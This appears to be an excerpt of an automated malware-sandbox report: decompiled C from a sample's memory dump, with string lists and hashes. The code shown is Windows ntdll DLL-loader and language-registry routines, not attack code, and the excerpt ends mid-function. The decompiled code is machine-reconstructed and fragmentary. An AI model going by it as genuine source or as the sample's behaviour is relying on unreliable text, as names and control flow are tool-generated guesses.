                                        0x016b3e77
                                        0x016b3e77
                                        0x016b3e7a
                                        0x016b3e7f
                                        0x016b3e8c
                                        0x016b3e8c
                                        0x016b3e91
                                        0x00000000
                                        0x016b3e91

                                        Strings
                                        • Kernel-MUI-Language-Disallowed, xrefs: 016B3E97
                                        • Kernel-MUI-Language-Allowed, xrefs: 016B3DC0
                                        • Kernel-MUI-Number-Allowed, xrefs: 016B3D8C
                                        • Kernel-MUI-Language-SKU, xrefs: 016B3F70
                                        • WindowsExcludedProcs, xrefs: 016B3D6F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 0-258546922
                                        • Opcode ID: 07739f5361179becfa4b666db069cd66aab3dcc93e8877e629263f1102e72fd8
                                        • Instruction ID: ea0eda86cd74f69f10aa383e8b2563a95f9b7373be429c838ca3a8982b50afc8
                                        • Opcode Fuzzy Hash: 07739f5361179becfa4b666db069cd66aab3dcc93e8877e629263f1102e72fd8
                                        • Instruction Fuzzy Hash: AAF14C72D01219EFCB12DF98CD80AEEBBF9FF58650F14016AE505A7251EB309E41CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E016D8E00(void* __ecx) {
                                        				signed int _v8;
                                        				char _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t32;
                                        				intOrPtr _t35;
                                        				intOrPtr _t43;
                                        				void* _t46;
                                        				intOrPtr _t47;
                                        				void* _t48;
                                        				signed int _t49;
                                        				void* _t50;
                                        				intOrPtr* _t51;
                                        				signed int _t52;
                                        				void* _t53;
                                        				intOrPtr _t55;
                                        
                                        				_v8 =  *0x179d360 ^ _t52;
                                        				_t49 = 0;
                                        				_t48 = __ecx;
                                        				_t55 =  *0x1798464; // 0x74cc0110
                                        				if(_t55 == 0) {
                                        					L9:
                                        					if( !_t49 >= 0) {
                                        						if(( *0x1795780 & 0x00000003) != 0) {
                                        							E01725510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                        						}
                                        						if(( *0x1795780 & 0x00000010) != 0) {
                                        							asm("int3");
                                        						}
                                        					}
                                        					return E016EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                        				}
                                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                        				_t43 =  *0x1797984; // 0x1242b00
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                        					if(_t48 == _t43) {
                                        						_t50 = 0x5c;
                                        						if( *_t32 == _t50) {
                                        							_t46 = 0x3f;
                                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                        								_t32 = _t32 + 8;
                                        							}
                                        						}
                                        					}
                                        					_t51 =  *0x1798464; // 0x74cc0110
                                        					 *0x179b1e0(_t47, _t32,  &_v12);
                                        					_t49 =  *_t51();
                                        					if(_t49 >= 0) {
                                        						L8:
                                        						_t35 = _v12;
                                        						if(_t35 != 0) {
                                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                        								E016D9B10( *((intOrPtr*)(_t48 + 0x48)));
                                        								_t35 = _v12;
                                        							}
                                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                        						}
                                        						goto L9;
                                        					}
                                        					if(_t49 != 0xc000008a) {
                                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                        							if(_t49 != 0xc00000bb) {
                                        								goto L8;
                                        							}
                                        						}
                                        					}
                                        					if(( *0x1795780 & 0x00000005) != 0) {
                                        						_push(_t49);
                                        						E01725510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                        						_t53 = _t53 + 0x1c;
                                        					}
                                        					_t49 = 0;
                                        					goto L8;
                                        				} else {
                                        					goto L9;
                                        				}
                                        			}


                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0171933B, 01719367
                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0171932A
                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01719357
                                        • LdrpFindDllActivationContext, xrefs: 01719331, 0171935D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 0-3779518884
                                        • Opcode ID: 19a76a4b702d4f63aaf169a575ba406efb5b3da8a383fc9e4fdaab8cd5879e09
                                        • Instruction ID: 8caafeedb74aa4083bae473d999137c7c8841ab01a031a5d3d1b0768d941ca45
                                        • Opcode Fuzzy Hash: 19a76a4b702d4f63aaf169a575ba406efb5b3da8a383fc9e4fdaab8cd5879e09
                                        • Instruction Fuzzy Hash: C6415B31E003159FDB36AB0CCC8DA79B7BDBB44718F068569DA0457252E7709D818FC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E016B8794(void* __ecx) {
                                        				signed int _v0;
                                        				char _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				signed int _v20;
                                        				intOrPtr _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				signed int _v40;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr* _t77;
                                        				signed int _t80;
                                        				signed char _t81;
                                        				signed int _t87;
                                        				signed int _t91;
                                        				void* _t92;
                                        				void* _t94;
                                        				signed int _t95;
                                        				signed int _t103;
                                        				signed int _t105;
                                        				signed int _t110;
                                        				signed int _t118;
                                        				intOrPtr* _t121;
                                        				intOrPtr _t122;
                                        				signed int _t125;
                                        				signed int _t129;
                                        				signed int _t131;
                                        				signed int _t134;
                                        				signed int _t136;
                                        				signed int _t143;
                                        				signed int* _t147;
                                        				signed int _t151;
                                        				void* _t153;
                                        				signed int* _t157;
                                        				signed int _t159;
                                        				signed int _t161;
                                        				signed int _t166;
                                        				signed int _t168;
                                        
                                        				_push(__ecx);
                                        				_t153 = __ecx;
                                        				_t159 = 0;
                                        				_t121 = __ecx + 0x3c;
                                        				if( *_t121 == 0) {
                                        					L2:
                                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                        							L6:
                                        							if(E016B934A() != 0) {
                                        								_t159 = E0172A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                        								__eflags = _t159;
                                        								if(_t159 < 0) {
                                        									_t81 =  *0x1795780; // 0x0
                                        									__eflags = _t81 & 0x00000003;
                                        									if((_t81 & 0x00000003) != 0) {
                                        										_push(_t159);
                                        										E01725510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                        										_t81 =  *0x1795780; // 0x0
                                        									}
                                        									__eflags = _t81 & 0x00000010;
                                        									if((_t81 & 0x00000010) != 0) {
                                        										asm("int3");
                                        									}
                                        								}
                                        							}
                                        						} else {
                                        							_t159 = E016B849B(0, _t122, _t153, _t159, _t180);
                                        							if(_t159 >= 0) {
                                        								goto L6;
                                        							}
                                        						}
                                        						_t80 = _t159;
                                        						goto L8;
                                        					} else {
                                        						_t125 = 0x13;
                                        						asm("int 0x29");
                                        						_push(0);
                                        						_push(_t159);
                                        						_t161 = _t125;
                                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                                        						_t143 = 0;
                                        						_v40 = _t161;
                                        						_t118 = 0;
                                        						_push(_t153);
                                        						__eflags = _t87;
                                        						if(_t87 != 0) {
                                        							_t118 = _t87 + 0x5d8;
                                        							__eflags = _t118;
                                        							if(_t118 == 0) {
                                        								L46:
                                        								_t118 = 0;
                                        							} else {
                                        								__eflags =  *(_t118 + 0x30);
                                        								if( *(_t118 + 0x30) == 0) {
                                        									goto L46;
                                        								}
                                        							}
                                        						}
                                        						_v32 = 0;
                                        						_v28 = 0;
                                        						_v16 = 0;
                                        						_v20 = 0;
                                        						_v12 = 0;
                                        						__eflags = _t118;
                                        						if(_t118 != 0) {
                                        							__eflags = _t161;
                                        							if(_t161 != 0) {
                                        								__eflags =  *(_t118 + 8);
                                        								if( *(_t118 + 8) == 0) {
                                        									L22:
                                        									_t143 = 1;
                                        									__eflags = 1;
                                        								} else {
                                        									_t19 = _t118 + 0x40; // 0x40
                                        									_t156 = _t19;
                                        									E016B8999(_t19,  &_v16);
                                        									__eflags = _v0;
                                        									if(_v0 != 0) {
                                        										__eflags = _v0 - 1;
                                        										if(_v0 != 1) {
                                        											goto L22;
                                        										} else {
                                        											_t128 =  *(_t161 + 0x64);
                                        											__eflags =  *(_t161 + 0x64);
                                        											if( *(_t161 + 0x64) == 0) {
                                        												goto L22;
                                        											} else {
                                        												E016B8999(_t128,  &_v12);
                                        												_t147 = _v12;
                                        												_t91 = 0;
                                        												__eflags = 0;
                                        												_t129 =  *_t147;
                                        												while(1) {
                                        													__eflags =  *((intOrPtr*)(0x1795c60 + _t91 * 8)) - _t129;
                                        													if( *((intOrPtr*)(0x1795c60 + _t91 * 8)) == _t129) {
                                        														break;
                                        													}
                                        													_t91 = _t91 + 1;
                                        													__eflags = _t91 - 5;
                                        													if(_t91 < 5) {
                                        														continue;
                                        													} else {
                                        														_t131 = 0;
                                        														__eflags = 0;
                                        													}
                                        													L37:
                                        													__eflags = _t131;
                                        													if(_t131 != 0) {
                                        														goto L22;
                                        													} else {
                                        														__eflags = _v16 - _t147;
                                        														if(_v16 != _t147) {
                                        															goto L22;
                                        														} else {
                                        															E016C2280(_t92, 0x17986cc);
                                        															_t94 = E01779DFB( &_v20);
                                        															__eflags = _t94 - 1;
                                        															if(_t94 != 1) {
                                        															}
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															 *_t118 =  *_t118 + 1;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															_t95 = E016D61A0( &_v32);
                                        															__eflags = _t95;
                                        															if(_t95 != 0) {
                                        																__eflags = _v32 | _v28;
                                        																if((_v32 | _v28) != 0) {
                                        																	_t71 = _t118 + 0x40; // 0x3f
                                        																	_t134 = _t71;
                                        																	goto L55;
                                        																}
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													goto L56;
                                        												}
                                        												_t92 = 0x1795c64 + _t91 * 8;
                                        												asm("lock xadd [eax], ecx");
                                        												_t131 = (_t129 | 0xffffffff) - 1;
                                        												goto L37;
                                        											}
                                        										}
                                        										goto L56;
                                        									} else {
                                        										_t143 = E016B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                        										__eflags = _t143;
                                        										if(_t143 != 0) {
                                        											_t157 = _v12;
                                        											_t103 = 0;
                                        											__eflags = 0;
                                        											_t136 =  &(_t157[1]);
                                        											 *(_t161 + 0x64) = _t136;
                                        											_t151 =  *_t157;
                                        											_v20 = _t136;
                                        											while(1) {
                                        												__eflags =  *((intOrPtr*)(0x1795c60 + _t103 * 8)) - _t151;
                                        												if( *((intOrPtr*)(0x1795c60 + _t103 * 8)) == _t151) {
                                        													break;
                                        												}
                                        												_t103 = _t103 + 1;
                                        												__eflags = _t103 - 5;
                                        												if(_t103 < 5) {
                                        													continue;
                                        												}
                                        												L21:
                                        												_t105 = E016EF380(_t136, 0x1681184, 0x10);
                                        												__eflags = _t105;
                                        												if(_t105 != 0) {
                                        													__eflags =  *_t157 -  *_v16;
                                        													if( *_t157 >=  *_v16) {
                                        														goto L22;
                                        													} else {
                                        														asm("cdq");
                                        														_t166 = _t157[5] & 0x0000ffff;
                                        														_t108 = _t157[5] & 0x0000ffff;
                                        														asm("cdq");
                                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                        														if(__eflags > 0) {
                                        															L29:
                                        															E016C2280(_t108, 0x17986cc);
                                        															 *_t118 =  *_t118 + 1;
                                        															_t42 = _t118 + 0x40; // 0x3f
                                        															_t156 = _t42;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															_t110 = E016D61A0( &_v32);
                                        															__eflags = _t110;
                                        															if(_t110 != 0) {
                                        																__eflags = _v32 | _v28;
                                        																if((_v32 | _v28) != 0) {
                                        																	_t134 = _v20;
                                        																	L55:
                                        																	E01779D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                        																}
                                        															}
                                        															L30:
                                        															 *_t118 =  *_t118 + 1;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															E016BFFB0(_t118, _t156, 0x17986cc);
                                        															goto L22;
                                        														} else {
                                        															if(__eflags < 0) {
                                        																goto L22;
                                        															} else {
                                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                        																	goto L22;
                                        																} else {
                                        																	goto L29;
                                        																}
                                        															}
                                        														}
                                        													}
                                        													goto L56;
                                        												}
                                        												goto L22;
                                        											}
                                        											asm("lock inc dword [eax]");
                                        											goto L21;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						return _t143;
                                        					}
                                        				} else {
                                        					_push( &_v8);
                                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                                        					_push(__ecx + 0x40);
                                        					_push(_t121);
                                        					_push(0xffffffff);
                                        					_t80 = E016E9A00();
                                        					_t159 = _t80;
                                        					if(_t159 < 0) {
                                        						L8:
                                        						return _t80;
                                        					} else {
                                        						goto L2;
                                        					}
                                        				}
                                        				L56:
                                        			}













































                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01709C28
                                        • LdrpDoPostSnapWork, xrefs: 01709C1E
                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01709C18
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 2994545307-1948996284
                                        • Opcode ID: a5d92d940554ed7332856d483c5cae84cc99e87a944ee6a5a056388341cf957b
                                        • Instruction ID: c34523705bb2e77c7392e30d6399ebf1d31ed5536cd4b55092942d0199e14982
                                        • Opcode Fuzzy Hash: a5d92d940554ed7332856d483c5cae84cc99e87a944ee6a5a056388341cf957b
                                        • Instruction Fuzzy Hash: B191E071A00216DBEF29DF5DDCC0AFAB7BEFF44314B154169DA05AB241E731A981CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E016B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				char _v24;
                                        				signed int _t73;
                                        				void* _t77;
                                        				char* _t82;
                                        				char* _t87;
                                        				signed char* _t97;
                                        				signed char _t102;
                                        				intOrPtr _t107;
                                        				signed char* _t108;
                                        				intOrPtr _t112;
                                        				intOrPtr _t124;
                                        				intOrPtr _t125;
                                        				intOrPtr _t126;
                                        
                                        				_t107 = __edx;
                                        				_v12 = __ecx;
                                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                        				_t124 = 0;
                                        				_v20 = __edx;
                                        				if(E016BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                        					_t112 = _v8;
                                        				} else {
                                        					_t112 = 0;
                                        					_v8 = 0;
                                        				}
                                        				if(_t112 != 0) {
                                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                        						_t124 = 0xc000007b;
                                        						goto L8;
                                        					}
                                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                        					 *(_t125 + 0x34) = _t73;
                                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                        						goto L3;
                                        					}
                                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                        					_t124 = E016AC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                        					if(_t124 < 0) {
                                        						goto L8;
                                        					} else {
                                        						goto L3;
                                        					}
                                        				} else {
                                        					L3:
                                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                        						L8:
                                        						return _t124;
                                        					}
                                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                        							goto L5;
                                        						}
                                        						_t102 =  *0x1795780; // 0x0
                                        						if((_t102 & 0x00000003) != 0) {
                                        							E01725510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                        							_t102 =  *0x1795780; // 0x0
                                        						}
                                        						if((_t102 & 0x00000010) != 0) {
                                        							asm("int3");
                                        						}
                                        						_t124 = 0xc0000428;
                                        						goto L8;
                                        					}
                                        					L5:
                                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                        						goto L8;
                                        					}
                                        					_t77 = _a4 - 0x40000003;
                                        					if(_t77 == 0 || _t77 == 0x33) {
                                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                        						if(E016C7D50() != 0) {
                                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        						} else {
                                        							_t82 = 0x7ffe0384;
                                        						}
                                        						_t108 = 0x7ffe0385;
                                        						if( *_t82 != 0) {
                                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                        								if(E016C7D50() == 0) {
                                        									_t97 = 0x7ffe0385;
                                        								} else {
                                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        								}
                                        								if(( *_t97 & 0x00000020) != 0) {
                                        									E01727016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                        								}
                                        							}
                                        						}
                                        						if(_a4 != 0x40000003) {
                                        							L14:
                                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                        							if(E016C7D50() != 0) {
                                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        							} else {
                                        								_t87 = 0x7ffe0384;
                                        							}
                                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                        								if(E016C7D50() != 0) {
                                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        								}
                                        								if(( *_t108 & 0x00000020) != 0) {
                                        									E01727016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                        								}
                                        							}
                                        							goto L8;
                                        						} else {
                                        							_v16 = _t125 + 0x24;
                                        							_t124 = E016DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                        							if(_t124 < 0) {
                                        								E016AB1E1(_t124, 0x1490, 0, _v16);
                                        								goto L8;
                                        							}
                                        							goto L14;
                                        						}
                                        					} else {
                                        						goto L8;
                                        					}
                                        				}
                                        			}




















                                        Strings
                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01709891
                                        • LdrpCompleteMapModule, xrefs: 01709898
                                        • minkernel\ntdll\ldrmap.c, xrefs: 017098A2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                        • API String ID: 0-1676968949
                                        • Opcode ID: 12eb3291fe63dcd99cb4433bc05a34d25089cd30211c08424262dc326c18b2c0
                                        • Instruction ID: 0baa7d474c8d79615160d35f5ea27a22fb3da1cd224d5b02b35aebd377b26eaa
                                        • Opcode Fuzzy Hash: 12eb3291fe63dcd99cb4433bc05a34d25089cd30211c08424262dc326c18b2c0
                                        • Instruction Fuzzy Hash: 2F51F131600745DBE722CB6CCD84BAABBE4EF84714F040699EA559B3D2D734ED82CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E016AE620(void* __ecx, short* __edx, short* _a4) {
                                        				char _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				char* _v28;
                                        				char _v32;
                                        				char _v36;
                                        				char _v44;
                                        				signed int _v48;
                                        				intOrPtr _v52;
                                        				void* _v56;
                                        				void* _v60;
                                        				char _v64;
                                        				void* _v68;
                                        				void* _v76;
                                        				void* _v84;
                                        				signed int _t59;
                                        				signed int _t74;
                                        				signed short* _t75;
                                        				signed int _t76;
                                        				signed short* _t78;
                                        				signed int _t83;
                                        				short* _t93;
                                        				signed short* _t94;
                                        				short* _t96;
                                        				void* _t97;
                                        				signed int _t99;
                                        				void* _t101;
                                        				void* _t102;
                                        
                                        				_t80 = __ecx;
                                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                        				_t96 = __edx;
                                        				_v44 = __edx;
                                        				_t78 = 0;
                                        				_v56 = 0;
                                        				if(__ecx == 0 || __edx == 0) {
                                        					L28:
                                        					_t97 = 0xc000000d;
                                        				} else {
                                        					_t93 = _a4;
                                        					if(_t93 == 0) {
                                        						goto L28;
                                        					}
                                        					_t78 = E016AF358(__ecx, 0xac);
                                        					if(_t78 == 0) {
                                        						_t97 = 0xc0000017;
                                        						L6:
                                        						if(_v56 != 0) {
                                        							_push(_v56);
                                        							E016E95D0();
                                        						}
                                        						if(_t78 != 0) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                        						}
                                        						return _t97;
                                        					}
                                        					E016EFA60(_t78, 0, 0x158);
                                        					_v48 = _v48 & 0x00000000;
                                        					_t102 = _t101 + 0xc;
                                        					 *_t96 = 0;
                                        					 *_t93 = 0;
                                        					E016EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                        					_v36 = 0x18;
                                        					_v28 =  &_v44;
                                        					_v64 = 0;
                                        					_push( &_v36);
                                        					_push(0x20019);
                                        					_v32 = 0;
                                        					_push( &_v64);
                                        					_v24 = 0x40;
                                        					_v20 = 0;
                                        					_v16 = 0;
                                        					_t97 = E016E9600();
                                        					if(_t97 < 0) {
                                        						goto L6;
                                        					}
                                        					E016EBB40(0,  &_v36, L"InstallLanguageFallback");
                                        					_push(0);
                                        					_v48 = 4;
                                        					_t97 = L016AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                        					if(_t97 >= 0) {
                                        						if(_v52 != 1) {
                                        							L17:
                                        							_t97 = 0xc0000001;
                                        							goto L6;
                                        						}
                                        						_t59 =  *_t78 & 0x0000ffff;
                                        						_t94 = _t78;
                                        						_t83 = _t59;
                                        						if(_t59 == 0) {
                                        							L19:
                                        							if(_t83 == 0) {
                                        								L23:
                                        								E016EBB40(_t83, _t102 + 0x24, _t78);
                                        								if(L016B43C0( &_v48,  &_v64) == 0) {
                                        									goto L17;
                                        								}
                                        								_t84 = _v48;
                                        								 *_v48 = _v56;
                                        								if( *_t94 != 0) {
                                        									E016EBB40(_t84, _t102 + 0x24, _t94);
                                        									if(L016B43C0( &_v48,  &_v64) != 0) {
                                        										 *_a4 = _v56;
                                        									} else {
                                        										_t97 = 0xc0000001;
                                        										 *_v48 = 0;
                                        									}
                                        								}
                                        								goto L6;
                                        							}
                                        							_t83 = _t83 & 0x0000ffff;
                                        							while(_t83 == 0x20) {
                                        								_t94 =  &(_t94[1]);
                                        								_t74 =  *_t94 & 0x0000ffff;
                                        								_t83 = _t74;
                                        								if(_t74 != 0) {
                                        									continue;
                                        								}
                                        								goto L23;
                                        							}
                                        							goto L23;
                                        						} else {
                                        							goto L14;
                                        						}
                                        						while(1) {
                                        							L14:
                                        							_t27 =  &(_t94[1]); // 0x2
                                        							_t75 = _t27;
                                        							if(_t83 == 0x2c) {
                                        								break;
                                        							}
                                        							_t94 = _t75;
                                        							_t76 =  *_t94 & 0x0000ffff;
                                        							_t83 = _t76;
                                        							if(_t76 != 0) {
                                        								continue;
                                        							}
                                        							goto L23;
                                        						}
                                        						 *_t94 = 0;
                                        						_t94 = _t75;
                                        						_t83 =  *_t75 & 0x0000ffff;
                                        						goto L19;
                                        					}
                                        				}
                                        			}































                                        Strings
                                        • @, xrefs: 016AE6C0
                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 016AE68C
                                        • InstallLanguageFallback, xrefs: 016AE6DB
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                        • API String ID: 0-1757540487
                                        • Opcode ID: d21b31101ac39c8107033fbc92cf9525c7f0e3d584940457b3ff89ccb02bfa2a
                                        • Instruction ID: 3c828a5e819d4010211ff94b9d8bd428a54a0d263398c79737ca7b3a1a4b3aef
                                        • Opcode Fuzzy Hash: d21b31101ac39c8107033fbc92cf9525c7f0e3d584940457b3ff89ccb02bfa2a
                                        • Instruction Fuzzy Hash: 4751D172505306DBD711DF68C840ABBB7E9AF88614F45092EF985D7290FB31DD04CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E016AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                        				signed int _t65;
                                        				signed short _t69;
                                        				intOrPtr _t70;
                                        				signed short _t85;
                                        				void* _t86;
                                        				signed short _t89;
                                        				signed short _t91;
                                        				intOrPtr _t92;
                                        				intOrPtr _t97;
                                        				intOrPtr* _t98;
                                        				signed short _t99;
                                        				signed short _t101;
                                        				void* _t102;
                                        				char* _t103;
                                        				signed short _t104;
                                        				intOrPtr* _t110;
                                        				void* _t111;
                                        				void* _t114;
                                        				intOrPtr* _t115;
                                        
                                        				_t109 = __esi;
                                        				_t108 = __edi;
                                        				_t106 = __edx;
                                        				_t95 = __ebx;
                                        				_push(0x90);
                                        				_push(0x177f7a8);
                                        				E016FD0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                        				if(__edx == 0xffffffff) {
                                        					L6:
                                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                        					__eflags = _t65 & 0x00000002;
                                        					if((_t65 & 0x00000002) != 0) {
                                        						L3:
                                        						L4:
                                        						return E016FD130(_t95, _t108, _t109);
                                        					}
                                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
